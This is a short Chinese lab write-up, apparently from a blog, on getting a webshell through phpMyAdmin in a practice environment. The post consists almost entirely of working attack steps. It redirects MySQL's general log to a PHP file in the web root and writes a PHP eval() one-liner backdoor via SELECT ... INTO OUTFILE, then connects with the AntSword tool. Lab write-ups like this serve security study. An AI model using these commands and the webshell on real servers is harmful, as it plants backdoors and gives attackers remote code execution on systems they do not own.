PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
一名优秀的码农4 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp4 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp4 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人4 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp4 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0074 天前
渗透测试_漏洞利用
网络安全
啥都想学点4 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ4 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏4 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk4 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全